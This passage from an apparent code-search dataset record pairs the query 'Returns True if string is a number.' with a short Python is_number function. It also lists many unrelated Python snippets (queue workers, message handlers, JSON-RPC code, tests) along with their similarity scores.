reply[\"error\"]:\n msg = \"No message included with error\"\n if \"message\" in reply[\"error\"]:\n msg = reply[\"error\"][\"message\"]\n #Call the proper error handler for the request that this response belongs to.\n match._handle_error(reply[\"error\"][\"code\"], msg)\n else:\n self.log.error(\"Error: Invalid JSON-RPC response entry. {node!r}.\",node = self.nodes[self.node_index])\n #del self.entries[reply_id]\n else:\n self.log.error(\"Error: Invalid JSON-RPC id in entry {rid!r}. {node!r}\",rid=reply_id, node = self.nodes[self.node_index])\n else:\n self.log.error(\"Error: Invalid JSON-RPC response without id in entry: {reply!r}: {node!r}\",reply=reply, node = self.nodes[self.node_index])\n except Exception as ex:\n self.log.failure(\"Error in _process_one_result {err!r}, {node!r}\",err=str(ex), node = self.nodes[self.node_index])\n def handle_response(response):\n \"\"\"Handle response for JSON-RPC batch query invocation.\"\"\"\n try:\n #Cancel any active timeout for this HTTPS call.\n if timeoutCall.active():\n timeoutCall.cancel()\n def cbBody(bodystring):\n \"\"\"Process response body for JSON-RPC batch query invocation.\"\"\"\n try:\n results = None\n #The bosy SHOULD be JSON, it not always is.\n try:\n results = json.loads(bodystring)\n except Exception as ex:\n #If the result is NON-JSON, may want to move to the next node in the node list\n self.log.error(\"Non-JSON response from server {node!r}\", node = self.nodes[self.node_index])\n self._next_node()\n #Add the failed sub-queue back to the command queue, we shall try again soon.\n self.queue = subqueue + self.queue\n if results != None:\n ok = False\n if isinstance(results, dict):\n #Running in legacy single JSON-RPC call mode (no batches), process the result of the single call.\n process_one_result(results)\n ok = True\n else:\n if isinstance(results, list):\n #Running in batch mode, process the batch result, one response at a time\n for reply in results:\n process_one_result(reply)\n ok = True\n else:\n #Completely unexpected result type, may want to move to the next node in the node list.\n self.log.error(\"Error: Invalid JSON-RPC response, expecting list as response on batch. {node!r}\",node = self.nodes[self.node_index])\n self._next_node()\n #Add the failed sub-queue back to the command queue, we shall try again soon.\n self.queue = subqueue + self.queue\n if ok == True:\n #Clean up the entries dict by removing all fully processed commands that now are no longer in the queu.\n for request_id in subqueue:\n if request_id in self.entries:\n del self.entries[request_id]\n else:\n self.log.error(\"Error: No response entry for request entry in result: {rid!r}. {node!r}\",rid=request_id, node = self.nodes[self.node_index])\n except Exception as ex:\n self.log.failure(\"Error in cbBody {err!r}. {node!r}\",err=str(ex), node = self.nodes[self.node_index])\n #This HTTPS POST is now fully processed.\n self.active_call_count = self.active_call_count - 1\n #Invoke self, possibly sending new queues RPC calls to the current node\n self()\n deferred2 = readBody(response)\n deferred2.addCallback(cbBody)\n return deferred2\n except Exception as ex:\n self.log.failure(\"Error in handle_response {err!r}. 
{node!r}\",err=str(ex),node = self.nodes[self.node_index])\n #If something went wrong, the HTTPS POST isn't active anymore.\n self.active_call_count = self.active_call_count - 1\n #Invoke self, possibly sending new queues RPC calls to the current node\n self()\n deferred.addCallback(handle_response)\n def _handle_error(error):\n \"\"\"Handle network level error for JSON-RPC request.\"\"\"\n try:\n #Abandon any active timeout triggers\n if timeoutCall.active():\n timeoutCall.cancel()\n #Unexpected error on HTTPS POST, we may want to move to the next node.\n self.log.error(\"Error on HTTPS POST : {cls!r} : {err!r}. {node!r}\",cls=error.type.__name__,err=error.getErrorMessage(),node = self.nodes[self.node_index])\n self._next_node()\n except Exception as ex:\n self.log.failure(\"Error in _handle_error {err!r}. {node!r}\",err=str(ex),node = self.nodes[self.node_index])\n #Add the failed sub-queue back to the command queue, we shall try again soon.\n self.queue = subqueue + self.queue\n ##If something went wrong, the HTTPS POST isn't active anymore.\n self.active_call_count = self.active_call_count - 1\n #Invoke self, possibly sending new queues RPC calls to the current node\n self()\n deferred.addErrback(_handle_error)\n timeoutCall = self.reactor.callLater(self.rpc_timeout, deferred.cancel)\n #Keep track of the number of active parallel HTTPS posts.\n self.active_call_count = self.active_call_count + 1\n return deferred\n except Exception as ex:\n self.log.failure(\"Error in _process_batch {err!r}. {node!r}\",err=str(ex),node = self.nodes[self.node_index])", "def queue_wrapper(result_queue, wid,\n func, args):\n result_queue.put((wid, func(*args)))", "def worker(my_idx, inq, outq):\n print(\"worker %d: starting\" % my_idx)\n backoff = .001\n while True:\n cmd = inq.get()\n if cmd is None:\n break\n ridx, creds, cmds = cmd\n backoff = max(backoff / 2, 0.001)\n while True:\n try:\n responses = Gmail.batch_executor(creds, cmds)\n except Gmail.UserRateException:\n print(f'worker {my_idx}: backoff {backoff} sec')\n sleep(backoff)\n backoff = min(backoff * 2, 1.0)\n except Exception as ex:\n outq.put([ridx, ex])\n break\n else:\n outq.put([ridx, responses])\n break\n inq.task_done()\n print(\"worker %d stoping\" % my_idx)", "def process_results(self):\n return self._do_action_under_lock(self._process_results)", "def _proto_step_result(self, message, step_name):\n res = json_format.MessageToDict(message)\n return self.step_data(\n step_name,\n self.m.json.output_stream(res),\n )", "def _workout_messages(self, msgs_bunch):\n if msgs_bunch != []:\n while True:\n r = requests.post(self.url, headers = self.headers, data = json.dumps(msgs_bunch))\n # request success condition below - to end the handler\n if r.status_code == 200:\n break\n print('http_handler: failed to retranslate messages, try again in ' + str(self.timeout) + ' sec')\n time.sleep(self.timeout)\n # next bunch of messages will not be read until this function ends\n # current bunch of messags will be deleted in next request if delete_flag = True is set", "def process_resp(self, msg, operation, status, index):\n metric = \"%s.%d.%s\" % (METRIC_NAME, index, operation)\n self.results.append(Event(TIMESTAMP_MILLIS(), \"opentsdb\", metric, msg, status))\n if status == \"0\":\n self.cause.extend(msg)\n metric = \"%s.%d.%s\" % (METRIC_NAME, index, \"health\")\n analyse_status = MonitorStatus[\"red\"]\n self.results.append(Event(TIMESTAMP_MILLIS(), \"opentsdb\", metric, msg, analyse_status))", "def on_task_result(self, task_id, raw_result):\n 
raise NotImplementedError", "def _process_msg(cls, msg):\n raise NotImplementedError", "def process_thread(self):", "def _process_results(self, *args, **kwargs): # noqa: E501\n # Lock before processing results to prevent conflicts\n if not self._acquire_pr_lock():\n return\n\n # Get the future instance\n future = self.future\n\n # Skip if no Future\n if not future:\n return\n\n # Skip processing results if forget\n if self.forget:\n # Clean up client\n self.client.close()\n return\n\n try:\n # Get results using the client\n result = self.client.gather(future)\n except Exception as e:\n # Tell scheduler to stop sending updates about this key\n self.client.set_metadata(self.key, False)\n # Clean up client\n self.client.close()\n result = e\n log.warning(\n 'Exception encountered when retrieving results: \"{}\"'.format(str(e))\n )\n\n # Tell scheduler to stop sending updates about this key\n self.client.set_metadata(self.key, False)\n\n # Handle custom process results function\n if self.process_results_function:\n # Get the process_results_function in TethysJob and call it with the result retrived\n try:\n result = self.process_results_function(result)\n except Exception as e:\n log.exception(\"Process Results Function Error\")\n self._status = \"ERR\"\n result = str(e)\n\n # Serialize the result\n try:\n self.result = result\n except Exception:\n log.exception(\"Results Serialization Error\")\n self._status = \"ERR\"\n else:\n self._status = \"COM\" if self._status != \"ERR\" else \"ERR\"\n\n # Erase the key to avoid problem with dask recycle key\n self.key = \"\"\n\n # save the results or status in the database\n self.save()\n\n # Clean up client\n self.client.close()\n\n if client_fire_forget:\n client_fire_forget.close()\n\n self._release_pr_lock()", "def handle_message(self, msg):\n pass", "def process(self, message: Message, **kwargs: Any) -> None:", "def request(self, *args, **kwargs):\n self.work_request_queue.put((args, kwargs))\n return self.result_queue.get()", "def request(self, *args, **kwargs):\n self.work_request_queue.put((args, kwargs))\n return self.result_queue.get()", "def handle_message(self, data, task_type, msgtype):\n data['message'] = data['message'].upper()\n return data", "def test_dispatch_raw(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper()\n broker = self.setup_broker(worker_helper)\n self.assertEqual(broker.get_messages('vumi', 'fooconn.foo'), [])\n msg = msg_helper.make_inbound('message')\n yield worker_helper.dispatch_raw('fooconn.foo', msg)\n self.assertEqual(broker.get_messages('vumi', 'fooconn.foo'), [msg])", "def _process_message(self, message: pubsub_message.Message) -> None:\n # Extract the task proto from the message.\n try:\n task = task_pb2.Task.FromString(message.data)\n except proto_message.DecodeError as e:\n logging.error('Unable to deserialize Task proto: %s', e)\n # If the message is gibberish, nacking keeps putting it back, wasting\n # resources for no reason. If the message is fine but there's a parsing\n # bug, nacking makes it possible to process the message normally after\n # fixing the bug. 
If the expected format of the message ever changes in an\n # incompatible way and a message with the new format is sent before the\n # worker is updated, nacking makes it possible to process the message\n # normally after updating the worker.\n message.nack()\n return\n\n # Find the registration, based on the type of proto stored in task.args.\n _, _, full_name = task.args.type_url.partition('/')\n try:\n registration = self._message_type_registry[full_name]\n except KeyError:\n logging.warning('Unknown type of task: %s', task.args.type_url)\n # If the task has a bogus type, nacking keeps putting it back, wasting\n # resources for no reason. If a new task type is added and those tasks are\n # requested before the worker code is updated, nacking makes it possible\n # to process the tasks after the worker code is updated. If an existing\n # task type is removed from the running worker code before all tasks of\n # that type have been processed, nacking keeps putting it back, wasting\n # resources.\n message.nack()\n return\n\n # Get the args proto.\n args = registration.task_args_class()\n task.args.Unpack(args)\n\n # Convert the task to a loggable string.\n try:\n task_string = self._task_to_string(task)\n except Exception: # pylint: disable=broad-except\n logging.exception(\n 'Unable to convert task of type %s to a string for logging.',\n full_name)\n # If self._task_to_string() fails for a reason unrelated to the task\n # itself, nacking makes it possible to process the task once\n # self._task_to_string() is working again. If something about the task\n # makes self._task_to_string() fail consistently, nacking makes it\n # possible to process the task once the bug in self._task_to_string() is\n # fixed. Additionally, users can catch and ignore exceptions in\n # self._task_to_string() itself if they want to always process tasks\n # regardless of whether it's possible to log the contents of the task.\n message.nack()\n return\n\n # Call the registered callback.\n logging.info('Processing task (message_id=%s):\\n%s', message.message_id,\n task_string)\n try:\n registration.callback(args)\n except Exception: # pylint: disable=broad-except\n logging.exception('Task failed (message_id=%s).', message.message_id)\n # See the comment above about nacking on self._task_to_string() failures\n # for the considerations here.\n message.nack()\n else:\n logging.info('Finished task (message_id=%s).', message.message_id)\n message.ack()", "def worker(self, q, return_dict):\n pid = os.getpid()\n while True:\n qqq = q.get()\n if qqq == 'DONE':\n # print('proc =', os.getpid())\n break\n\n (idx, d) = qqq\n mol_id = d[0]\n smi = d[1]\n # print screening processing in every pout step\n if self.pout != 0:\n if idx % self.pout == self.pout-1:\n print(\"processing: \", idx+1, flush=True)\n result_dict = self.simulation_process(idx, mol_id, smi, pid)\n return_dict[idx] = result_dict", "def handle_message(poll_service, poll_fulfillment_request, django_request):\n try:\n rsp = models.ResultSetPart.objects.get(result_set__pk=poll_fulfillment_request.result_id,\n part_number=poll_fulfillment_request.result_part_number,\n result_set__data_collection__name=poll_fulfillment_request.collection_name)\n\n poll_response = rsp.to_poll_response_11(poll_fulfillment_request.message_id)\n rsp.result_set.last_part_returned = rsp\n rsp.save()\n return poll_response\n except models.ResultSetPart.DoesNotExist:\n raise StatusMessageException(poll_fulfillment_request.message_id,\n ST_NOT_FOUND,\n {SD_ITEM: 
str(poll_fulfillment_request.result_id)})", "def _handle(self, msg: Message) -> Message:\n\n # skip executor for non-DataRequest\n if msg.envelope.request_type != 'DataRequest':\n if msg.request.command == 'TERMINATE':\n raise RuntimeTerminated()\n self.logger.debug(f'skip executor: not data request')\n return msg\n\n req_id = msg.envelope.request_id\n num_expected_parts = self._get_expected_parts(msg)\n self._data_request_handler.handle(\n msg=msg,\n partial_requests=[m.request for m in self._pending_msgs[req_id]]\n if num_expected_parts > 1\n else None,\n peapod_name=self.name,\n )\n\n return msg", "def test_wait_for_dispatched_inbound(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper()\n d = worker_helper.wait_for_dispatched_inbound(1, 'fooconn')\n self.assertNoResult(d)\n msg = msg_helper.make_inbound('message')\n yield self._add_to_dispatched(\n worker_helper.broker, 'fooconn.inbound', msg, kick=True)\n dispatched = success_result_of(d)\n self.assertEqual(dispatched, [msg])", "async def process(self, msg):\n logger.debug(\"msg:\", json.dumps(msg), caller=self)\n e = msg.get(\"e\")\n if e == \"executionReport\": # Order update.\n if msg[\"s\"] != self._raw_symbol:\n return\n order_no = \"{}_{}\".format(msg[\"i\"], msg[\"c\"])\n if msg[\"X\"] == \"NEW\":\n status = ORDER_STATUS_SUBMITTED\n elif msg[\"X\"] == \"PARTIALLY_FILLED\":\n status = ORDER_STATUS_PARTIAL_FILLED\n elif msg[\"X\"] == \"FILLED\":\n status = ORDER_STATUS_FILLED\n elif msg[\"X\"] == \"CANCELED\":\n status = ORDER_STATUS_CANCELED\n elif msg[\"X\"] == \"REJECTED\":\n status = ORDER_STATUS_FAILED\n elif msg[\"X\"] == \"EXPIRED\":\n status = ORDER_STATUS_FAILED\n else:\n logger.warn(\"unknown status:\", msg, caller=self)\n return\n order = self._orders.get(order_no)\n if not order:\n info = {\n \"platform\": self._platform,\n \"account\": self._account,\n \"strategy\": self._strategy,\n \"order_no\": order_no,\n \"action\": msg[\"S\"],\n \"order_type\": msg[\"o\"],\n \"symbol\": self._symbol,\n \"price\": msg[\"p\"],\n \"quantity\": msg[\"q\"],\n \"ctime\": msg[\"O\"]\n }\n order = Order(**info)\n self._orders[order_no] = order\n order.remain = float(msg[\"q\"]) - float(msg[\"z\"])\n order.status = status\n order.utime = msg[\"T\"]\n if self._order_update_callback:\n SingleTask.run(self._order_update_callback, copy.copy(order))", "def async_handle_message(self, msg: dict) -> None:\n if msg[\"type\"] == \"result\":\n future = self._result_futures.get(msg[\"messageId\"])\n\n if future is None:\n self._logger.warning(\n \"Received result for unknown message: %s\", msg[\"messageId\"]\n )\n return\n\n if msg[\"success\"]:\n future.set_result(msg[\"result\"])\n return\n\n future.set_exception(FailedCommand(msg[\"messageId\"], msg[\"errorCode\"]))\n return\n\n if self.driver is None:\n raise InvalidState(\"Did not receive state as first message\")\n\n if msg[\"type\"] != \"event\":\n # Can't handle\n return\n\n event = Event(type=msg[\"event\"][\"event\"], data=msg[\"event\"])\n self.driver.receive_event(event)", "def process_queued_msg(self):\n try:\n while not self.queue.empty():\n port, tbl = self.queue.get()\n reveived_port = self.switches[port.neighbor_switch_dpid].ports[port.neighbor_port_no]\n self.tbl.update_by_neighbor(reveived_port, port, tbl)\n self.deploy_routing_table()\n except:\n pass", "def execute_message_received(self, message_received):\n pass", "def _worker(self, args):\n pass", "def queue_handler(self):\n work_queue = []\n query_count = 0\n\n while query_count < self.count:\n 
work_queue.append(self.build_packet(self.record))\n query_count += 1\n\n self.send_queries(work_queue)", "def monitor_queue(queue_id):\n current = dt.datetime.now()\n queue_log = {}\n for sub_id in get_submissions(queue_id=queue_id):\n submission = get_submission_bundle(queue_id, sub_id)\n if submission['status'] == 'RECEIVED':\n queue_log[sub_id] = {'status': 'PENDING'}\n continue\n run_log = submission['run_log']\n if run_log['run_id'] == 'failed':\n queue_log[sub_id] = {'status': 'FAILED'}\n continue\n run_log['wes_id'] = submission['wes_id']\n if run_log['status'] in ['COMPLETE', 'CANCELED', 'EXECUTOR_ERROR']:\n queue_log[sub_id] = run_log\n continue\n wes_instance = WESService(submission['wes_id'])\n run_status = wes_instance.get_run_status(run_log['run_id'])\n\n if run_status['state'] in ['QUEUED', 'INITIALIZING', 'RUNNING']:\n etime = convert_timedelta(\n current - ctime2datetime(run_log['start_time'])\n )\n elif 'elapsed_time' not in run_log:\n etime = 0\n else:\n etime = run_log['elapsed_time']\n\n run_log['status'] = run_status['state']\n run_log['elapsed_time'] = etime\n\n update_submission(queue_id, sub_id, 'run_log', run_log)\n\n if run_log['status'] == 'COMPLETE':\n wf_config = queue_config()[queue_id]\n sub_status = run_log['status']\n if wf_config['target_queue']:\n # store_verification(wf_config['target_queue'],\n # submission['wes_id'])\n sub_status = 'VALIDATED'\n update_submission(queue_id, sub_id, 'status', sub_status)\n\n queue_log[sub_id] = run_log\n\n return queue_log", "def _process_result(self, result):\n if \"errorCode\" in result:\n self._process_error(result)\n else:\n return result", "def test_job_failure(app):\n with worker(app):\n state = wait_for_results(app, length=100, sleep=0.2, maxwait=4)\n\n # Tasks have been delivered and executed.\n assert set(r.return_value for r in all_results(app)) == set(range(100))\n assert len(state.queue.messages) == 0\n\n # Consumer groups behaved properly.\n assert state.queue.info.groups == 1\n assert state.queue.groups[0].pending == 0\n\n # Nothing in the DLQ.\n assert len(state.dead.messages) == 0\n\n # Any scheduled tasks completed and removed.\n assert len(state.schedule) == 0", "def test_get_dispatched(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper()\n dispatched = worker_helper.get_dispatched(\n 'fooconn', 'inbound', TransportUserMessage)\n self.assertEqual(dispatched, [])\n msg = msg_helper.make_inbound('message')\n self._add_to_dispatched(\n worker_helper.broker, 'fooconn.inbound', msg)\n dispatched = worker_helper.get_dispatched(\n 'fooconn', 'inbound', TransportUserMessage)\n self.assertEqual(dispatched, [msg])", "def work(self):\n while True:\n message = self.get()\n self.handle(message)", "def test_dispatch_status(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper()\n broker = self.setup_broker(worker_helper)\n\n self.assertEqual(broker.get_messages('vumi', 'fooconn.status'), [])\n\n msg = msg_helper.make_status(\n status='down',\n component='foo',\n type='bar',\n message='baz')\n\n yield worker_helper.dispatch_status(msg, 'fooconn')\n\n self.assertEqual(\n broker.get_messages('vumi', 'fooconn.status'), [msg])", "def handle_messages(self):\n\n #Get the time at which the code started running\n current_time = datetime.datetime.now()\n\n #get all messages between now and the time where a message was last received\n messages = self.client.messages.list(\n date_sent_before = datetime.datetime.now()+ datetime.timedelta(hours = TIMEDIFFERENCE),\n date_sent_after = 
self.last_message_timing + datetime.timedelta(hours = TIMEDIFFERENCE)\n )\n\n #Iterate through all the new messages\n for record in messages:\n #If it is not from the Twilio Client\n if record.from_ != 'whatsapp:+14155238886':\n #Then update the timing of the last message to the current time\n self.last_message_timing = current_time\n #If the message sent is the '?' that seeks to get the number\n #of people in the queue\n if record.body == '?':\n #Get the data about people from firebase\n people_data = self.firebase.get_data('people_count')\n #Get the number of people queueing\n no_of_people = people_data['people_count']\n #Create a message from the API to tell the person\n #asking the number of people in the queue\n message = self.client.messages.create(\n body='The number of the people in the queue is {}'.format(no_of_people),\n from_='whatsapp:{sender_number}'.format(**self.config),\n to=record.from_\n )", "def handle_ACS_worklist_info_response(self,message,conn):\n response=ResponseClientHandle.switch_msg_stream_type_str2dict(message)\n \n msg_type=response.get(event.KEY_MESSAGE)\n msg_group = int(msg_type) & 0xFF00\n \n if (msg_group == event.EVENT_WORKLIST_GROUP):\n \n # check worklist reseve response\n if(msg_type == event.EV_WORKLIST_RESERVE_RSP):\n log.debug_info(\"ACS server's response worklist reserve suc\")\n\n # call worklist execute start request \n DUTqueue.ResponseWLexecHandle.handle_WLexec_start_request(self.msg,response,None)\n \n elif(msg_type == event.EV_WORKLIST_RESERVE_FAIL):\n log.debug_info(\"ACS server's response worklist reserve fail\")\n\n ResponseClientHandle.handle_send_response(response,conn)\n \n # check worklist start response \n elif(msg_type == event.EV_WORKLIST_EXEC_START_RSP):\n log.debug_info(\"ACS server's response worklist execute start suc\")\n \n # call worklist execute request\n DUTqueue.ResponseWLexecHandle.handle_WLexec_request(self.dut_obj_handle,self.msg,response,conn)\n\n elif(msg_type == event.EV_WORKLIST_EXEC_START_FAIL):\n log.debug_info(\"ACS server's response worklist execute start fail\")\n \n ResponseClientHandle.handle_send_response(response,conn)\n\n # check worklist finish response \n elif(msg_type == event.EV_WORKLIST_EXEC_FINISH_RSP):\n log.debug_info(\"ACS server's response worklist execute finish suc\")\n\n elif(msg_type == event.EV_WORKLIST_EXEC_FINISH_FAIL):\n log.debug_info(\"ACS server's response worklist execute finish fail\")\n \n # check worklist build/bind/download response\n else:\n ResponseClientHandle.handle_send_response(response,conn)\n \n else:\n err_info = \"Unsupport msg event group:%d\" % msg_group\n log.debug_info(err_info)\n ResponseClientHandle.handle_except(self.msg,self.conn,err_info)", "def _recv(self):\n\n self.had_recv_error = []\n self.recv_exc = {}\n results = []\n import sys;\n #only listen on workers involved in calculation.\n for worker in self.workers[:self.Nsent]:\n if worker in self.had_send_error:\n results.append(None)\n else:\n try:\n sys.stdout.flush()\n results.append(worker.recv())\n except sync_cluster.RemoteError:\n import sys\n err = sys.exc_info()[1]\n # Force the err msg (err[1]) to be a string.\n # This dimishes info content, but makes sure\n # that the sames errors are hashed correctly\n # in the dictionary. 
(does it?)\n err_type,err_msg, err_traceback = err\n err = err_type,str(err_msg), err_traceback\n self.had_recv_error.append(worker)\n try: self.recv_exc[err].append(worker.id)\n except: self.recv_exc[err] = [worker.id]\n results.append(None)\n except sync_cluster.RemoteCrashError:\n # Gotta be more intelligent here...\n msg = 'Error! Remote worker %d appears to have crashed.' \\\n % worker.id\n raise sync_cluster.RemoteCrashError,msg\n # else handle other errors\n #print\n return tuple(results)" ]
[ "0.6850718", "0.6538829", "0.65200484", "0.64860433", "0.6379262", "0.63759804", "0.62607986", "0.6202013", "0.6202013", "0.61881113", "0.61721927", "0.6146824", "0.61398584", "0.6130029", "0.6085379", "0.60829306", "0.6052195", "0.60503155", "0.6036185", "0.5957413", "0.59528136", "0.5928204", "0.59262717", "0.5890043", "0.588151", "0.5857312", "0.58555824", "0.58444524", "0.5837317", "0.5830393", "0.5797025", "0.5778435", "0.575851", "0.575363", "0.5749782", "0.5748115", "0.57173455", "0.57141376", "0.5708827", "0.5669862", "0.5669805", "0.5668781", "0.5632324", "0.5631926", "0.56312424", "0.5617743", "0.5615145", "0.5613224", "0.56105256", "0.55955476", "0.5592492", "0.5574398", "0.5574095", "0.5564366", "0.5562877", "0.55519956", "0.554186", "0.5541317", "0.5540563", "0.55270916", "0.55153483", "0.54992175", "0.54960084", "0.54879326", "0.5484235", "0.5483091", "0.54687494", "0.5467488", "0.5467412", "0.54646784", "0.5459038", "0.5457132", "0.5442117", "0.5432905", "0.5428562", "0.5427398", "0.5424205", "0.5424205", "0.5408864", "0.5376861", "0.5370635", "0.5368436", "0.53636676", "0.5363277", "0.5356413", "0.5346465", "0.5345586", "0.53444415", "0.5340364", "0.53383553", "0.53353995", "0.5333702", "0.5324205", "0.5320672", "0.531562", "0.53141445", "0.5312734", "0.5307528", "0.5304341", "0.53026825" ]
0.6439669
4
Returns True if string is a number.
def is_number(s): try: float(s) return True except ValueError: return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_number(string):\r\n try:\r\n float(string)\r\n return True\r\n except ValueError: return False", "def is_number(string):\n try:\n float(string)\n return True\n except ValueError:\n return False", "def is_number(s):\r\n try:\r\n int(s)\r\n return True\r\n except ValueError:\r\n return False", "def is_number(s):\n try:\n int(s)\n return True\n except ValueError:\n return False", "def is_number(s):\r\n try:\r\n float(s)\r\n return True\r\n except ValueError:\r\n return False", "def is_number(str):\n\n # Local constants\n\n # Local variabes\n\n #****** start is_number() ******#\n\n try:\n float(str)\n return True\n except ValueError:\n return False", "def is_number(str):\n try:\n float(str)\n return True\n except ValueError as e:\n print(e)\n try:\n unicodedata.numeric(str)\n return True\n except (TypeError, ValueError) as e:\n print(e)\n return False", "def is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_valid_numeric(inString):\r\n return is_int(inString) or is_float(inString)", "def is_number(s: Any) -> bool:\n try:\n int(s)\n return True\n except ValueError:\n pass\n\n try:\n float(s)\n return True\n except ValueError:\n pass\n\n return False", "def _is_number(s) -> bool:\n try:\n float(s)\n except ValueError:\n return False\n else:\n return True", "def IsNumber(s):\n try:\n v = float(s)\n return True\n except ValueError:\n return False", "def isNumber(s):\n\ttry:\n\t\tfloat(s)\n\t\treturn True\n\texcept ValueError:\n\t\treturn False", "def is_number(s: Union[str, int, float]):\n if isinstance(s, str) and s.lower() == \"nan\":\n return True\n try:\n float(s)\n return True\n except ValueError:\n return False", "def isNumber(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_number(self,s):\n try:\n float(s.replace(\" \", \"\"))\n return True\n except ValueError:\n return False", "def isNumber(self, s):\n try:\n tmp = float(s)\n return True\n except:\n return False", "def is_some_number(mystring):\n # print(Bcolors.cyan + re.findall(r\".*\\\\(.*)\", inspect.stack()[0][1])[0] + \" --- \"\n # + inspect.stack()[0][3] + \"()\" + Bcolors.ENDC)\n mystring = str(mystring)\n mystring = re.sub(\",\", \".\", mystring)\n try:\n if float(mystring):\n return True\n except ValueError:\n return False", "def is_number_repl_isnumeric(s):\n return s.replace('.', '', 1).isnumeric()", "def __has_numbers(self, input_string):\n return bool(re.search(r'\\d', input_string))", "def _isnumber(string):\n if not _isconvertible(float, string):\n return False\n elif isinstance(string, (str, bytes)) and (\n math.isinf(float(string)) or math.isnan(float(string))\n ):\n return string.lower() in [\"inf\", \"-inf\", \"nan\"]\n return True", "def isnumeric(number):\n try:\n float(number)\n return True\n except (TypeError, ValueError):\n return False", "def is_numeric(s):\n \n if s == False or s == None or s == \"\" or s == True:\n return False\n \n try:\n float(s)\n return True\n except (ValueError, TypeError):\n return False", "def checkifnumber(self, test_string):\r\n try:\r\n float(test_string)\r\n return(True)\r\n except ValueError:\r\n return(False)", "def is_number(value):\n try:\n int(value)\n return True\n except (ValueError, TypeError):\n return False", "def _is_number(value):\n try:\n float(value)\n return True\n except (TypeError, ValueError):\n return False", "def is_numeric(val):\n if \\\n isinstance(val, int) or \\\n isinstance(val, float):\n return True\n elif \\\n isinstance(val, str) and \\\n val.isdigit():\n return True\n 
else:\n return False", "def isnumber(n):\r\n N = str(n)\r\n if N.isdigit():\r\n return True\r\n else:\r\n return False", "def isnumber(x):\n try:\n float(x)\n return True\n except ValueError:\n return False", "def is_number(c):\n return '0' <= c <= '9'", "def IsNumeric(text):\n try:\n _ = float(text)\n except ValueError:\n return 0\n else:\n return 1", "def is_number(num):\n try:\n float(num)\n return True\n except ValueError:\n return False", "def is_numeric(value):\n return any([\n type(value) is str and value.isnumeric(),\n hasattr(value, 'is_integer') and value.is_integer(),\n type(value) is int,\n ])", "def isNumber(string):\r\n for char in string:\r\n charNum = ord(char)\r\n if (charNum < 48 or charNum > 57):\r\n return False\r\n return True", "def is_num(var):\n try:\n int(var)\n return True\n except ValueError:\n return False", "def __is_int(self,string):\r\n try: \r\n int(string)\r\n return True\r\n except ValueError:\r\n return False", "def is_number(value):\n try:\n float(value)\n return True\n except ValueError:\n return False", "def is_int(string:str) -> bool:\n try:\n int(string)\n return True\n except:\n return False", "def isnum(value):\n\n try:\n return bool(isinstance(value, (float, int)))\n except RuntimeError:\n return False", "def is_integer(self, string):\n try:\n return int(string)\n except:\n return False", "def is_number(n):\n\ttry:\n\t\tfloat(n)\n\t\treturn True\n\texcept ValueError:\n\t\treturn False", "def is_number_regex(s):\n if re_match('^\\d+?\\.\\d+?$', s) is None:\n return s.isdigit()\n return True", "def is_number_regex(s):\n if re.match(\"^\\d+?\\.\\d+?$\", s) is None:\n return s.isdigit()\n return True", "def is_number_regex(s):\n if re.match(\"^\\d+?\\.\\d+?$\", s) is None:\n return s.isdigit()\n return True", "def is_number(number):\n try:\n float(number)\n return True\n except ValueError:\n return False", "def isnum(self, x):\n\n return x in '1234567890.-'", "def is_int(string):\n try:\n int(string)\n return True\n except ValueError:\n return False", "def is_num(n):\n return '{} is a number'.format(n)", "def is_number_tryexcept(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_number(number):\n if type(number) == type(1) or type(number) == type(0.1) or type(number) == type('') or type(u''):\n try:\n float(number)\n return True\n except ValueError:\n return False\n except TypeError:\n return False\n else:\n return False", "def isit_float(s):\r\n try:\r\n int(s)\r\n return False\r\n except ValueError:\r\n try:\r\n float(s)\r\n return True\r\n except ValueError:\r\n return False", "def is_number(self,val):\n try:\n float(val)\n return True\n except ValueError:\n return False", "def is_number(x):\n if isinstance(x, (int, float)):\n return True\n else:\n return False", "def is_numeric(value):\n return isinstance(value, int) or isinstance(value, float)", "def could_be_number(val):\n if val == None:\n return False\n\n if isinstance(val, (float, int, long)):\n return True\n\n # allow coercion from str\n if isinstance(val, (str, unicode)):\n try:\n n = float(val)\n if not isinstance(n, float):\n raise ValueError\n else:\n return True\n except:\n return False\n\n #otherwise\n return False", "def is_number(self) -> bool:\n return False", "def isNumber(word):\n try:\n int(word)\n return True\n except ValueError:\n return False", "def is_number_repl_isdigit(s):\n return s.replace('.', '', 1).isdigit()", "def is_number_tryexcept(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_number(value):\n\n 
return isinstance(value, (int, long, float))", "def is_number(text):\n return text.lower() in AVRO_NUMBERS", "def isNumber(number):\n try:\n # Try to cast the string\n int(number)\n # The cast was successful\n return True\n # The cast was unsuccessful, the string is not a number\n except ValueError as err:\n # Write the exception in logging\n logging.exception(str(err))\n return False", "def is_integer(s: Union[str, int, float]):\n try:\n float(s)\n except ValueError:\n return False\n else:\n return float(s).is_integer() and not np.isnan(float(s))", "def isNumber(st):\n\treturn st.replace('.','',1).isdigit()", "def isNumeric(string, needHexPrefix):\n return (True)", "def ISNUMBER(value):\n return isinstance(value, numbers.Number)", "def is_numeric(number):\n\n if isinstance(number, bool):\n return False\n elif isinstance(number, int) or isinstance(number, float):\n return True\n else:\n return False", "def test_is_number(self):\n \n self.assertEqual(self.var.is_number(None), False)\n self.assertEqual(self.var.is_number(\"5\"), True)\n self.assertEqual(self.var.is_number(\"a\"), False)", "def has_number(any_string):\n return any(char.isdigit() for char in any_string)", "def is_number(n):\n return isinstance(n, (int, float))", "def is_digit_regex(s: str) -> bool:\n if re.match(\"^\\d+?\\.\\d+?$\", s) is None:\n return s.isdigit()\n return True", "def isnumeric(self):\n return isnumeric(self)", "def isInt(s):\n try:\n int(s)\n return True\n except ValueError:\n return False", "def _check_message_is_number(message):\n try:\n float(message)\n return True\n except ValueError:\n return False", "def isint(str):\n\n try:\n int(str)\n return True\t\t\t#Returns true if the string is an integer\n except (ValueError, TypeError):\n return False\t\t\t#Returns false otherwise", "def is_number_parse_float(s):\n 